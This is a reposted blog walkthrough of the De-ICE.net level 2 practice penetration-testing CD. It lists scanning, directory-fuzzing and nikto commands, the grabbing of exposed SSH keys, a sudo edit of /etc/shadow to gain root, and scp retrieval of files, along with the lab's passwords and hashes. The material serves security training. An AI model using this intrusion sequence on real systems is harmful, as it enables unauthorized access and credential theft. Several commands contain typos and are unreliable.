Monday, September 12, 2011

HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

What is this?

This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
Dictionary(s)

Software
Name: De-ICE.net
Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso
http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar
http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.2.1-255

nmap -n -sV -sS -O 192.168.2.100

nmap -n -sV -sS -O 192.168.2.101

firefox 192.168.2.100

[+]kate -> list of possible usernames. Save. Filename: usernames.txt

firefox 192.168.2.101

[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80



firefox http://192.168.2.101/~pirrip

[+]kate -> Update usernames with the ones which we got a respond from. Save.

[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2

./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124

firefox http://192.168.2.101/~pirrip/.ssh

// Save both files

mv /root/id_rsa /http://root/.ssh/id_rsa

mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub

chmod 000 /http://root/.ssh/id_rsa

chmod 000 /http://root/.ssh/id_rsa.pub

ssh pirrip@192.168.2.100
// Yes

mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'

cd /etc/

vi passwd

// kate -> Update usernames with only valid ones.

vi group

sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st

su
// Password: 0l1v3rTw1st

cd /root/

ls -a

cd .save/

ls -a

chmod -R 777 /root/

//In BackTrack//

scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/

unzip great_expectations.zip

tar xf great_expectations.tar

strings Jan08

//In SSH//
sudo iv /var/mail/havisham

modprobe capability

//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //

ls -a

//In SSH//

exit


//In BackTrack//

[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.